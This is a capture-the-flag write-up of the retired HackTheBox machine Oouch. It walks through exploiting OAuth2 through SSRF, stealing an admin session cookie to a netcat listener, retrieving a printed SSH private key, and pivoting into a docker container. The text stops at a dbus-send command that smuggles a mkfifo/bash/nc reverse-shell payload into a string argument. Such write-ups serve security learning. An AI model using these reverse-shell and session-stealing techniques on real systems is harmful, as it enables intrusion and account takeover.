Posts Hackthebox Oouch writeup
Post
Cancel

Hackthebox Oouch writeup

Information

ColumnDetails
NameOouch
Points40
DifficultyHard
CreatorQTC
Out On14 march 2020
creator’s Twitter@qtc_de
Retired on1 Aug 2020

Brief@oouch:~$

This is relatively an insane box , It revolves around the Oauth2 as feom which we get account linked to qtc (admin) using a SSRF and then a xss in which just gave we have to steal cookies of the user qtc and from that sesion id we logged into api and get the ssh-keys for user.There is a docker running and we can ssh into it.Exploiting the uwsgi to get shell as www-data and then exploiting dbus to get shell as root

Summary

  • Finding the hidden dir Oauth
  • Getting the token code for the account
  • Using ssrf in Contact page linking the account with qtc
  • Logging in as qtc
  • Making an application and accessing it
  • Getting sessionid of qtc Using xss + ssrf with the application we made
  • Getting the access code
  • Getting the ssh private keys of user qtc on api
  • Logging in as qtc
  • Getting User.txt
  • Finding the docker ip running on 172.17.8.0/16 and 172.18.8.0/16
  • Logging in to docker
  • exploting the uwsgi service running as www-data
  • Finding the routes.py running the dbus as root
  • Exploting the Dbus To get a shell as root
  • Getting root.txt

Got Root

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
➜  prashant git:(master) nmap -sV -sC -T4 -p- oouch.htb
Nmap scan report for oouch.htb (10.10.10.177)
Host is up (0.25s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            49 Feb 11 18:34 project.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.15.241
|      Logged in as ftp
|      TYPE: ASCII
|      Session bandwidth limit in byte/s is 30000
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:6b:a7:2b:7a:21:9f:21:11:37:11:ed:50:4f:c6:1e (RSA)
|_  256 d2:af:55:5c:06:0b:60:db:9c:78:47:b5:ca:f4:f1:04 (ED25519)
5000/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-title: Welcome to Oouch
|_Requested resource was http://oouch.htb:5000/login?next=%2F
8000/tcp open  rtsp
| fingerprint-strings: 
|   FourOhFourRequest, GetRequest, HTTPOptions: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|     <h1>Bad Request (400)</h1>
|   RTSPRequest: 
|     RTSP/1.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|     <h1>Bad Request (400)</h1>
|   SIPOptions: 
|     SIP/2.0 400 Bad Request
|     Content-Type: text/html
|     Vary: Authorization
|_    <h1>Bad Request (400)</h1>
|_http-title: Site doesn't have a title (text/html).
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=3/8%Time=5E641866%P=x86_64-pc-linux-gnu%r(Get
SF:Request,64,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/html\r\nVary:\x20Authorization\r\n\r\n<h1>Bad\x20Request\x20\(400\)</h
SF:1>")%r(FourOhFourRequest,64,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/html\r\nVary:\x20Authorization\r\n\r\n<h1>Bad\x20Requ
SF:est\x20\(400\)</h1>")%r(HTTPOptions,64,"HTTP/1\.0\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/html\r\nVary:\x20Authorization\r\n\r\n<h1>
SF:Bad\x20Request\x20\(400\)</h1>")%r(RTSPRequest,64,"RTSP/1\.0\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/html\r\nVary:\x20Authorization\
SF:r\n\r\n<h1>Bad\x20Request\x20\(400\)</h1>")%r(SIPOptions,63,"SIP/2\.0\x
SF:20400\x20Bad\x20Request\r\nContent-Type:\x20text/html\r\nVary:\x20Autho
SF:rization\r\n\r\n<h1>Bad\x20Request\x20\(400\)</h1>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 846.49 seconds

port 21

1
2
3
4
5
6
7
8
9
10
11
➜  oouch git:(master) ✗ ftp oouch.htb 
Connected to consumer.oouch.htb.
220 qtc's development server
Name (oouch.htb:prashant): anonymous
\230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> \ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            49 Feb 11 18:34 project.txt
1
2
3
➜  oouch git:(master)cat project.txt 
Flask -> Consumer
Django -> Authorization Server

Its just mean nothing to me at begining So, I move on to next port

Port 8000

Its was just showing Bad request So….Just moved to another port Port-5000

Port 5000

Port-5000

There is a register tab i registered with the

  • username: 0xprashant
  • email: phax789@gmail.com
  • password: 123

And got access to the application Port-5000

After that i ran a gobuster with the wordlist seclist-big.txt

Gobuster

Gobuster with the wordlist dirbuster-medium.txt gives me nothing interesting But on changing the Wordlist to seclists-Big.txt Got a Dir Called Oauth

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
➜  Desktop git:(master) ✗ gobuster dir -u http://oouch.htb:5000/ -w big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://consumer.oouch.htb:5000/
[+] Threads:        10
[+] Wordlist:       big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/21 09:58:06 Starting gobuster
===============================================================
/about (Status: 302)
/contact (Status: 302)
/documents (Status: 302)
/home (Status: 302)
/login (Status: 200)
/logout (Status: 302)
/oauth (Status: 302)
/profile (Status: 302)
/register (Status: 200)
===============================================================

And Going to it `http://oouch.htb/oauth

Port-5000

And Here i got a new subdomain consumer.oouch.htb I added it to my hosts file and click on the first link and got redirected to http://authorization.oouch.htb:8000/login/

I added this subdomain on the hosts file too

Now i can access it

Port-5000

And now understood the File project.txt we got from the ftp server the port 5000 is running on flask and the port 8000 is based on Django framework.

I found the Oauth that is running on the is of version Oauth2 I got a very good article on exploting the oauth2

https://dhavalkapil.com/blogs/Attacking-the-OAuth-Protocol/

In this article its mentioned how can we link our account with the admin account.Int this article the method is used is csrf and we already know that there is a ssrf in the contact page. So we can do it via ssrf.

Attacking the Oauth

Its Time for attacking the Oauth.We need to get the token code for our own account and.And Enter the Token code with full url in the contact page.As there is a ssrf so the qtc will access our url that we sent in contact page.

Register on Authorization.oouch.htb:8000

We need to Register on http://Authorization.oouch.htb:8000.

Port-8000

And get back to http://consumer.oouch.htb:5000/oauth/connect

Getting the token-code

Fired up the burp intercept the request

1
2
3
4
5
6
7
8
9
10
GET /oauth/connect HTTP/1.1
Host: consumer.oouch.htb:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://consumer.oouch.htb:5000/oauth
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJxlj8FqwzAQRH9F0TkUyV5ppXxFaQ89lBCk1co2cexgyVAI-feq7bGnZdmZnTcPeclzKCMXefp8SFHbkDcuJQwsj_J15lBYzOsgpkXUVQSidhR1nIq4N82LPD-P_31vPEylbqFO6yLe919T3ueD-OCZ1hsL9XXfWmxY6qF9OB8bxsZllKe67dy2KcmTjKkD74FN8Jw1WbImK88JQTEkNMFpTInZAJHjZKA3BrDTnUbwwWDMtsuaFWaje0jJJecRLFifiDxbpTQ67BxxRAsxRBcRNGqlqfeEfStCZcuXul55aTzMLjUgpROFYBiQ-z5mxzYanVuugww62h_fXnj7K2Hk8xu1rGy8.XnrhEw.1uKY40Etms4DlhXv-43HqvHeKWI
Connection: close

I Forwarded it and got another one

1
2
3
4
5
6
7
8
9
10
GET /oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read HTTP/1.1
Host: authorization.oouch.htb:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://consumer.oouch.htb:5000/oauth
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=dB9lD6DHKI5AW7LhVNpEanGDtDpfy8VEIjz8RbbIfogvvmX3j9gUqUKWbX8kI7gl; sessionid=fg196u4hh438xn8kl0g9vw2ematcpe02
Connection: close

I forwarded this one too !! And on my browser i got the following authorize button

Authorize

After clicking on authorize button i got another request

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read HTTP/1.1
Host: authorization.oouch.htb:8000
Content-Length: 266
Cache-Control: max-age=0
Origin: http://authorization.oouch.htb:8000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://authorization.oouch.htb:8000/oauth/authorize/?client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&response_type=code&redirect_uri=http://consumer.oouch.htb:5000/oauth/connect/token&scope=read
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=dB9lD6DHKI5AW7LhVNpEanGDtDpfy8VEIjz8RbbIfogvvmX3j9gUqUKWbX8kI7gl; sessionid=fg196u4hh438xn8kl0g9vw2ematcpe02
Connection: close
csrfmiddlewaretoken=nbamgjrqpDiZ2GyLdVles1bhLUgQdt1TCj4TF9XGEGtO9fIpYEpWUXzarhmRSPPn&redirect_uri=http%3A%2F%2Fconsumer.oouch.htb%3A5000%2Foauth%2Fconnect%2Ftoken&scope=read&client_id=UDBtC8HhZI18nJ53kJVJpXp4IIffRhKEXZ0fSd82&state=&response_type=code&allow=Authorize

And i forward this request too

And Finally i got the token code

Token-code

after getting token code we need to drop the request so because we can only use the token code at one time.If We send the request the account will linked to our own and the token code will be of no use.So drop the last request.

And the token code with full url is http://consumer.oouch.htb:5000/oauth/connect/token?code=GbcTSxvMWTM6czwwmQ0K5XEJkGEI4W

SSRF in contact page

And now here come ssrf part.Paste the link with the token code we got in the

SSRF

Send the request without any interception. Wait for some time approx 10 sec.And now click on the second link we have in /oauth dir

login as QTC

http://consumer.oouch.htb:5000/oauth/login And we can see a new authorize button showing on our screen!! Cool

SSRF

After clicking on in i am logged in as qtc

Logging as qtc

Documents of qtc

We can access qtc Documents now that re in /Documents dir

ColumnDetails
dev_access.txtdevelop:supermegasecureklarabubu123! -> Allows application registration.
o_auth_notes.txt/api/get_user -> user data. oauth/authorize -> Now also supports GET method.
todo.txtChris mentioned all users could obtain my ssh key. Must be a joke…

The above details were in a table type syntax.

We can conclude some points from the documents

  • the credentials we got maybe used for sometype registration
  • there is an api which contains users data
  • And the ssh key of user is stored in unsecured way on website somewhere

I ran a dirb recursive search on the http://authorization.oouch.htb:8000/ To check for Hidden dirs.

And after some hit and trials i got the dir

/oauth/applications/register

Registering for application

We got a login page

Loging page

We can use the credentials we got from qtc Documents

develop:supermegasecureklarabubu123!

And we got logged in,And got a application

Application registration

i Registered a new application with the following details

Application

Getting sessionid of qtc

And i tried to access the application via its name but i was failed Then i tried to access the application via parameters that we selected during creating the application

Likewise i can access the application i made using

http://authorization.oouch.htb:8000/oauth/authorize/?client_id=7ZLCaJIn9NzEQ081RCpkk6rLwc7aJmYZGDmfvhsn&redirect_uri=http://10.10.14.21:4444&grant_type=authorization_code&client_secret=xSxBgeE6uzDfT2cx4vnHDIygiLlwyI65aMYC6pzR77HaNSi7GhhLZmoRsKZJQ3vHOcRI7VeO2wVnWd56AhucNeBL1KgOLGdbRKy5B5dgxvWIbFWrUjAJS3oDYJ3EGqdn

To test the url i paste the url in my browser and started my nc listener on port 4444 And it got hitted

1
2
3
4
5
6
7
8
9
10
11
➜  prashant git:(master) ✗ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.14.21] 60280
GET /?error=invalid_request&error_description=Missing+response_type+parameter. HTTP/1.1
Host: 10.10.14.21:4444
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Now its time for ssrf again we have to paste the url in the contact page and we will the cookies of the user qtc and then we can use the cookies to login as qtc

Sessionid

And after few seconds we got the cookies on our nc listener

1
2
3
4
5
6
7
8
9
10
➜  prashant git:(master) ✗ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.177] 40134
GET /?error=invalid_request&error_description=Missing+response_type+parameter. HTTP/1.1
Host: 10.10.14.21:4444
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: sessionid=dvd11o5h4jbzs9m5c0xieh9ds0c298ll;

Cookie: sessionid=dvd11o5h4jbzs9m5c0xieh9ds0c298ll

I am using a cookie editor,Its a chrome extension you can get it here Cookie-editor

Paste the session id u got in the cookie-editor and refresh the page.And i m logged in as qtc

QTC

Getting access token to access api

We are logged in as qtc Now.Now our aim is to get access to api.For accessing api we need to get a access token.And we can get that by making a POST request to http://authorization.oouch.htb:8000/oauth/token/ using curl

1
2
curl -X POST 'http://authorization.oouch.htb:8000/oauth/token/' -H "Content-Type: application/x-www-form-urlencoded" --data "grant_type=client_credentials&client_id=7ZLCaJIn9NzEQ081RCpkk6rLwc7aJmYZGDmfvhsn&client_secret=xSxBgeE6uzDfT2cx4vnHDIygiLlwyI65aMYC6pzR77HaNSi7GhhLZmoRsKZJQ3vHOcRI7VeO2wVnWd56AhucNeBL1KgOLGdbRKy5B5dgxvWIbFWrUjAJS3oDYJ3EGqdn
" -L -s

And the response was

1
{"access_token": "LpLKz5mxCzy8mxCLPnbzhtseeXyeEK", "expires_in": 600, "token_type": "Bearer", "scope": "read write"}#

Getting ssh keys of qtc

I tried to access the /api/get_user using the token code we got but i got the same.I still cant access it.Then i tried it to get_ssh instead of get_user.

The final url in my browser was

http://authorization.oouch.htb:8000/api/get_ssh/?access_token=LpLKz5mxCzy8mxCLPnbzhtseeXyeEK

And i Got the ssh keys but it was in a very wrong format.Copied the ssh keys to my text editor

SSH_keys

and after some editing and removing all the\n from the file.It was looking like this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Login as qtc using ssh

Now i have the private ssh keys i can login as qtc by giving id_rsa appropirate permission

1
2
3
4
5
6
7
8
9
10
11
12
➜  oouch git:(master)chmod 600 id_rsa
➜  oouch git:(master) ✗ ssh -i id_rsa qtc@oouch.htb 
Linux oouch 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 25 12:45:55 2020 from 10.10.14.3
qtc@oouch:~$ 

Got user.txt

1
2
3
qtc@oouch:~$ cat user.txt
ba7--------------------------d14
qtc@oouch:~$ 

Privilege escalation

Login to docker

Tried to running various monitoring scripts but no success.

Running ps -aux and ss gave me some interesting results that there is a docker running on the machine.

I did a command ip a.It Displays info about all network interfaces and also about the docker and its interfaces related to it.And we got the ip range on which the docker and related service is running

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
qtc@oouch:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:ba:81 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.177/24 brd 10.10.10.255 scope global ens34
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:ba81/64 scope global dynamic mngtmpaddr 
       valid_lft 86117sec preferred_lft 14117sec
    inet6 fe80::250:56ff:feb9:ba81/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:66:92:e9:2c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: br-cc6c78e0c7d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:9f:43:75:f5 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-cc6c78e0c7d0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:9fff:fe43:75f5/64 scope link 
       valid_lft forever preferred_lft forever
6: veth97fb0c5@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-cc6c78e0c7d0 state UP group default 
    link/ether 12:49:7c:41:00:bb brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::1049:7cff:fe41:bb/64 scope link 
       valid_lft forever preferred_lft forever
8: vethdd01113@if7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-cc6c78e0c7d0 state UP group default 
    link/ether 2a:ff:b0:3c:04:92 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::28ff:b0ff:fe3c:492/64 scope link 
       valid_lft forever preferred_lft forever
10: veth5dad994@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-cc6c78e0c7d0 state UP group default 
    link/ether e6:bc:82:f1:c5:04 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::e4bc:82ff:fef1:c504/64 scope link 
       valid_lft forever preferred_lft forever
12: vetha1db8fd@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-cc6c78e0c7d0 state UP group default 
    link/ether 02:27:bb:85:15:5f brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::27:bbff:fe85:155f/64 scope link 
       valid_lft forever preferred_lft forever

Interesting ones are

1
2
3
4
5
6
7
8
9
10
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:66:92:e9:2c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: br-cc6c78e0c7d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:9f:43:75:f5 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-cc6c78e0c7d0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:9fff:fe43:75f5/64 scope link 
       valid_lft forever preferred_lft forever

These interfaces are running on a very different ips.Docker is running on it.

I tried to login with 172.17.0.1 and the private ssh key of qtc user.

1
2
3
4
5
6
7
qtc@oouch:~$ ssh -i .ssh/id_rsa qtc@172.17.0.1
The authenticity of host '172.17.0.1 (172.17.0.1)' can't be established.
ED25519 key fingerprint is SHA256:6/ZyfRrDDz0w1+EniBrf/0LXg5sF4o5jYNEjjU32y8s.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.17.0.1' (ED25519) to the list of known hosts.
qtc@172.17.0.1: Permission denied (publickey).
qtc@oouch:~$ 

But i just logged in myself as qtc again on oouch its because the ip i entered is the gateway. And the gateway is itself the oouch….machine (My bad).

Tried with 172.17.0.2

1
2
qtc@oouch:~$ ssh -i .ssh/id_rsa qtc@172.17.0.2
ssh: connect to host 172.17.0.2 port 22: No route to host

And likewise i tried ips till 172.17.0.10 but no success

Then i just moved to another interface and got success on 172.18.0.2 and logged in to docker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
qtc@oouch:~$ ssh -i .ssh/id_rsa qtc@172.18.0.2
The authenticity of host '172.18.0.2 (172.18.0.2)' can't be established.
ED25519 key fingerprint is SHA256:ROF4hYtv6efFf0CQ80jfB60uyDobA9mVYiXVCiHlhSE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '172.18.0.2' (ED25519) to the list of known hosts.
Linux aeb4525789d8 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
qtc@aeb4525789d8:~$ 

Now if we go to / dir there is a dir called code

1
drwxr-xr-x   4 root root 4096 Feb 11 17:34 code

The web services were running from the docker on port 5000 and 8000 flask and django

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
qtc@aeb4525789d8:/code$ ls -la
total 52
drwxr-xr-x 4 root root 4096 Feb 11 17:34 .
drwxr-xr-x 1 root root 4096 Feb 25 12:33 ..
-rw-r--r-- 1 root root 1072 Feb 11 17:34 Dockerfile
-r-------- 1 root root  568 Feb 11 17:34 authorized_keys
-rw-r--r-- 1 root root  325 Feb 11 17:34 config.py
-rw-r--r-- 1 root root   23 Feb 11 17:34 consumer.py
-r-------- 1 root root 2602 Feb 11 17:34 key
drwxr-xr-x 4 root root 4096 Feb 11 17:34 migrations
-rw-r--r-- 1 root root  724 Feb 11 17:34 nginx.conf
drwxr-xr-x 5 root root 4096 Feb 11 17:34 oouch
-rw-r--r-- 1 root root  241 Feb 11 17:34 requirements.txt
-rwxr-xr-x 1 root root   89 Feb 11 17:34 start.sh
-rw-rw-rw- 1 root root    0 Mar 26 08:36 urls.txt
-rw-r--r-- 1 root root  163 Feb 11 17:34 uwsgi.ini

Hmmmm…interesting

There is file called routes.py in /code/oouch/ it Contains some lines of code thast uses dbus and reveals the interface.

1
2
3
4
qtc@aeb4525789d8:/code/oouch$ cat routes.py | grep dbus
import dbus
            bus = dbus.SystemBus()
            block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')

I tried to run dbus-send to send reply to the dbus-interface and embeding the nc-payload in it,With string

1
2
3
4
qtc@aeb4525789d8:/code/oouch$ dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block  htb.oouch.Block.Block "string:;rm /tmp/.0; mkfifo /tmp/.0; cat /tmp/.0 | /bin/bash -i 2>&1 | nc 172.18.0.1 1234 >/tmp/.0;"

